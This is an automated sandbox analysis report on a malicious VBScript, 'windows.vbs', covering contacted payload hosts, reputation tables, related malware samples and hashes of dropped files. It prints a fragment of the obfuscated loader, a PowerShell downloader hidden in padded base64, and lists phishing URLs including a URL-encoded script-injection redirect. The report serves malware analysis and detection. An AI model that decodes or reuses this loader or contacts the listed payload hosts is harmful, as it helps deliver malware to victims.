                https://themes.googleusercontent.comwscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://app01.system.com.br/RDWeb/Pages/login.aspxwscript.exe, 00000000.00000003.2325461625.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.00000125100F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2514780950.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2516088916.000001250FD80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325898663.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326061758.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522409365.000001250E0E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520382934.000001250FD72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325381099.000001250FD80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520106323.000001250E0E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325544492.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326031502.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520623399.000001250FDA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522622351.000001250FD70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2516046227.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519449118.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2514887391.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325932418.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522645221.000001250FD75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325356738.000001250E05A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519449118.000001250FD84000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://go.microsoft.coTpowershell.exe, 00000006.00000002.3043269238.000001D4C3C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://pastsubposto.subpostosubposto/d/umwscript.exe, 00000000.00000003.2325512254.000001250FD74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326031502.000001250FD7A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                188.114.97.3
                paste.eeEuropean Union
                13335CLOUDFLARENETUStrue
                162.159.129.233
                cdn.discordapp.comUnited States
                13335CLOUDFLARENETUSfalse
                188.114.96.3
                uploaddeimagens.com.brEuropean Union
                13335CLOUDFLARENETUStrue
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1446639
                Start date and time:2024-05-23 18:25:13 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 36s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:10
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:windows.vbs
                Detection:MAL
                Classification:mal100.spre.troj.expl.evad.winVBS@6/10@3/3
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 1
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 6312 because it is empty
                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: windows.vbs
                TimeTypeDescription
                12:26:28API Interceptor1x Sleep call for process: wscript.exe modified
                12:26:34API Interceptor62x Sleep call for process: powershell.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                188.114.97.3WRnJsnI1Zq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • objectiveci.top/pythonpacketGamebigloadprivateCentral.php
                http://hjkie5.pages.dev/Get hashmaliciousUnknownBrowse
                • hjkie5.pages.dev/
                56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
                • qr-in.com/GDKZCby
                Enquiry No. 2421005.xla.xlsxGet hashmaliciousUnknownBrowse
                • qr-in.com/atBVKxq
                56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
                • qr-in.com/GDKZCby
                file.exeGet hashmaliciousUnknownBrowse
                • wagner3.net/admin
                Product Listsd#U0334r#U0334o#U0334w#U0334..exeGet hashmaliciousFormBookBrowse
                • www.sba99prag.com/pshj/
                ORDIN.xlsGet hashmaliciousUnknownBrowse
                • qr-in.com/HDYwZbx
                ORDIN.xlsGet hashmaliciousUnknownBrowse
                • qr-in.com/HDYwZbx
                SSDQ115980924.exeGet hashmaliciousFormBookBrowse
                • www.ilodezu.com/z48v/
                162.159.129.233Cheat_Lab_2.7.2.msiGet hashmaliciousUnknownBrowse
                • cdn.discordapp.com/attachments/1175364766026436628/1175364839565176852/2
                Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                • cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
                SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
                64AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousDCRatBrowse
                • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                http://162.159.129.233Get hashmaliciousUnknownBrowse
                • 162.159.129.233/favicon.ico
                2lfV6QiE6j.exeGet hashmaliciousUnknownBrowse
                • cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
                SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeGet hashmaliciousAmadeyBrowse
                • cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
                1PhgF7ujwW.exeGet hashmaliciousAmadeyBrowse
                • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                vhNyVU8USk.exeGet hashmaliciousAmadeyBrowse
                • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                188.114.96.3PI No 20000814C.exeGet hashmaliciousFormBookBrowse
                • www.ilodezu.com/z48v/
                https://m.exactag.com/ai.aspx?tc=d9069973bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atvlasestrellas.com%2Fxb%2F97956%2F%2FYy5tdXNjYXRAYW5kYXJpYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                • tvlasestrellas.com/favicon.ico
                http://enter-mantagalaxies.com/Get hashmaliciousUnknownBrowse
                • enter-mantagalaxies.com/
                56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
                • qr-in.com/GDKZCby
                Enquiry No. 2421005.xla.xlsxGet hashmaliciousUnknownBrowse
                • qr-in.com/atBVKxq
                Enquiry No. 2421005.xla.xlsxGet hashmaliciousUnknownBrowse
                • qr-in.com/atBVKxq
                20240403_Oferta factory..xlsGet hashmaliciousUnknownBrowse
                • bitly.cx/owdri
                file.exeGet hashmaliciousCMSBruteBrowse
                • cutradition.com/pma/
                20240403_Oferta factory..xlsGet hashmaliciousUnknownBrowse
                • bitly.cx/owdri
                20240403_Oferta factory..xlsGet hashmaliciousUnknownBrowse
                • bitly.cx/owdri
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                cdn.discordapp.comhttp://enter-mantagalaxies.com/Get hashmaliciousUnknownBrowse
                • 162.159.129.233
                Receipt #761.vbsGet hashmaliciousUnknownBrowse
                • 162.159.130.233
                SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exeGet hashmaliciousUnknownBrowse
                • 162.159.129.233
                SecuriteInfo.com.Win32.TrojanX-gen.8759.5386.exeGet hashmaliciousUnknownBrowse
                • 162.159.134.233
                SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exeGet hashmaliciousUnknownBrowse
                • 162.159.129.233
                SecuriteInfo.com.Win32.TrojanX-gen.8759.5386.exeGet hashmaliciousUnknownBrowse
                • 162.159.129.233
                file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                • 162.159.133.233
                https://s.net.vn/nAaaGet hashmaliciousUnknownBrowse
                • 162.159.135.233
                fx28wfnZ4J.exeGet hashmaliciousBabuk, Djvu, PrivateLoader, SmokeLoaderBrowse
                • 162.159.135.233
                DATASHEET rfq.exeGet hashmaliciousGuLoaderBrowse
                • 162.159.133.233
                paste.eeINVOICE.jsGet hashmaliciousAgentTeslaBrowse
                • 188.114.97.3
                Dados Do Hospede.ppamGet hashmaliciousNjratBrowse
                • 188.114.96.3
                Receipt #761.vbsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                Drwg.xlsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                PHARMACEUTICAL ORDER.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                Plat#U0103 Factura MTL11852.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                PON2401071.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                irlforme.docGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                PURCHASE ORDER_REQUEST.xla.xlsxGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                PON2401071.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                uploaddeimagens.com.brINVOICE.jsGet hashmaliciousAgentTeslaBrowse
                • 188.114.97.3
                Receipt #761.vbsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                Plat#U0103 Factura MTL11852.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                Payment928263456.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 188.114.97.3
                PON2401071.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                irlforme.docGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                PURCHASE ORDER_REQUEST.xla.xlsxGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                PON2401071.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                vbs.zipGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                INV_#501424.vbsGet hashmaliciousXWormBrowse
                • 188.114.96.3
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUShttps://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                • 104.17.2.184
                http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3EGet hashmaliciousPhisherBrowse
                • 188.114.96.3
                ELECTRONIC RECEIPT_Europait.htmlGet hashmaliciousHTMLPhisherBrowse
                • 104.17.2.184
                30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                • 104.26.12.205
                ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                • 104.18.138.17
                PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 104.26.12.205
                https://drive.google.com/drive/folders/1Zsq5Vi6xg6khSGcx49wWM-Q7O4uJNp0w?usp=sharingGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                http://mi.michaels.com/p/cp/d278335eb0e4f32c/c?mi_u=0b5077a2e65ed331ee5d2de857007cdfe1a618cd5fa2ea47fde9894ad456adce&mi_ecmp=Certificate_Reminder_T4&url=//sritulasifarmstays.in/wp#acctspayable@magmutual.comGet hashmaliciousHTMLPhisherBrowse
                • 104.21.24.120
                https://invitebowlcheckout.info/bowlGet hashmaliciousUnknownBrowse
                • 172.67.197.146
                CLOUDFLARENETUShttps://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                • 104.17.2.184
                http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3EGet hashmaliciousPhisherBrowse
                • 188.114.96.3
                ELECTRONIC RECEIPT_Europait.htmlGet hashmaliciousHTMLPhisherBrowse
                • 104.17.2.184
                30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                • 104.26.12.205
                ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                • 104.18.138.17
                PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 104.26.12.205
                https://drive.google.com/drive/folders/1Zsq5Vi6xg6khSGcx49wWM-Q7O4uJNp0w?usp=sharingGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                http://mi.michaels.com/p/cp/d278335eb0e4f32c/c?mi_u=0b5077a2e65ed331ee5d2de857007cdfe1a618cd5fa2ea47fde9894ad456adce&mi_ecmp=Certificate_Reminder_T4&url=//sritulasifarmstays.in/wp#acctspayable@magmutual.comGet hashmaliciousHTMLPhisherBrowse
                • 104.21.24.120
                https://invitebowlcheckout.info/bowlGet hashmaliciousUnknownBrowse
                • 172.67.197.146
                CLOUDFLARENETUShttps://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                • 104.17.2.184
                http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3EGet hashmaliciousPhisherBrowse
                • 188.114.96.3
                ELECTRONIC RECEIPT_Europait.htmlGet hashmaliciousHTMLPhisherBrowse
                • 104.17.2.184
                30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                • 104.26.12.205
                ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                • 104.18.138.17
                PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 104.26.12.205
                https://drive.google.com/drive/folders/1Zsq5Vi6xg6khSGcx49wWM-Q7O4uJNp0w?usp=sharingGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                http://mi.michaels.com/p/cp/d278335eb0e4f32c/c?mi_u=0b5077a2e65ed331ee5d2de857007cdfe1a618cd5fa2ea47fde9894ad456adce&mi_ecmp=Certificate_Reminder_T4&url=//sritulasifarmstays.in/wp#acctspayable@magmutual.comGet hashmaliciousHTMLPhisherBrowse
                • 104.21.24.120
                https://invitebowlcheckout.info/bowlGet hashmaliciousUnknownBrowse
                • 172.67.197.146
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                3b5074b1b5d032e5620f69f9f700ff0ehttps://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                • 162.159.129.233
                • 188.114.96.3
                30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                • 162.159.129.233
                • 188.114.96.3
                ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                • 162.159.129.233
                • 188.114.96.3
                PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 162.159.129.233
                • 188.114.96.3
                phish_alert_sp2_2.0.0.0-214.emlGet hashmaliciousUnknownBrowse
                • 162.159.129.233
                • 188.114.96.3
                https://mydhl.express.dhl$tracking_link/Get hashmaliciousUnknownBrowse
                • 162.159.129.233
                • 188.114.96.3
                https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
                • 162.159.129.233
                • 188.114.96.3
                https://one.acme.si/sagecn/fr.htmlGet hashmaliciousUnknownBrowse
                • 162.159.129.233
                • 188.114.96.3
                https://organic.mushroomstrade%5B.%5Dcom/?aNqBNW=Nm&rd_DyKZBUOXd0TNevGZu3_F7iSKU5CUSZG11cnJheUBtZXJjaGFudHNjYXBpdGFsLmNvbQ==Get hashmaliciousUnknownBrowse
                • 162.159.129.233
                • 188.114.96.3
                SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                • 162.159.129.233
                • 188.114.96.3
                37f463bf4616ecd445d4a1937da06e19PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 188.114.97.3
                doc023571961504.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 188.114.97.3
                Clear.7zGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                SwiftCopy_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 188.114.97.3
                ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 188.114.97.3
                rPurchaseOrderPO05232024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 188.114.97.3
                Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 188.114.97.3
                msimg32.dllGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                INVOICE.jsGet hashmaliciousAgentTeslaBrowse
                • 188.114.97.3
                ORDER_245230978.pdf.jsGet hashmaliciousADWINDBrowse
                • 188.114.97.3
                No context
                Process:C:\Windows\System32\wscript.exe
                File Type:Unicode text, UTF-8 text, with very long lines (13333), with CRLF line terminators
                Category:dropped
                Size (bytes):15497
                Entropy (8bit):4.763890616076409
                Encrypted:false
                SSDEEP:384:CdIX5ZVwILgLIJPssz4d+msCGDGG3j/R+H+miRgHVpPgRlVN5bgOjH00ND/AtFk:jVFc0JPX4gnCGCG3j/RNpiV+jv/P
                MD5:3DE9205FC9691BC288F19589A5865B26
                SHA1:487AAE77A1896B7E26BDD0FB6EE4A061CF474BFD
                SHA-256:0F0087F1DB5D5F78BD3B409A7B9B1AF6EFE3C7171E279FB863B13A59287A665F
                SHA-512:F47688529DAAAC4B3FC1BF7FA76CE06CA0849DEC686C034C1E92DF37215438024870956C900B6037E9BB55B99CD61D38E5D4634BB2458C278066B34935830CE9
                Malicious:false
                Reputation:low
                Preview:.. dim insubjugado , grafopsicologia , camita , massoreta , noivo , Cama , noivo1.. grafopsicologia = " ".. camita = "" & massoreta & grafopsicologia & massoreta & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & massoreta & grafopsicologia & massoreta & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & massoreta & grafopsicologia & massoreta & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & massoreta & grafopsicologia & massoreta & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & massoreta & grafopsicologia & massoreta & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & massoreta & grafopsicologia & massoreta &
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):9434
                Entropy (8bit):4.928515784730612
                Encrypted:false
                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                MD5:D3594118838EF8580975DDA877E44DEB
                SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                Malicious:false
                Reputation:low
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1940658735648508
                Encrypted:false
                SSDEEP:3:Nlllulf66llp:NllUSOl
                MD5:B798C92691636A7830BE142C313C0E72
                SHA1:53C2A97D145573705355A8C39757DB8009D116CC
                SHA-256:5D6C0E321D148D9CD398B4261686BA6344F9FFF6FB4226AF1C8AEE4FB89DC75F
                SHA-512:6198106131F8C8083DA7946BADE71A6BB3A37474DC81E699976680CD3ACC1E84B8A151F7F8D15A79C1343BB108992D44CB98FE78593F55CE891B669EB6022106
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:@...e................................................@..........
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
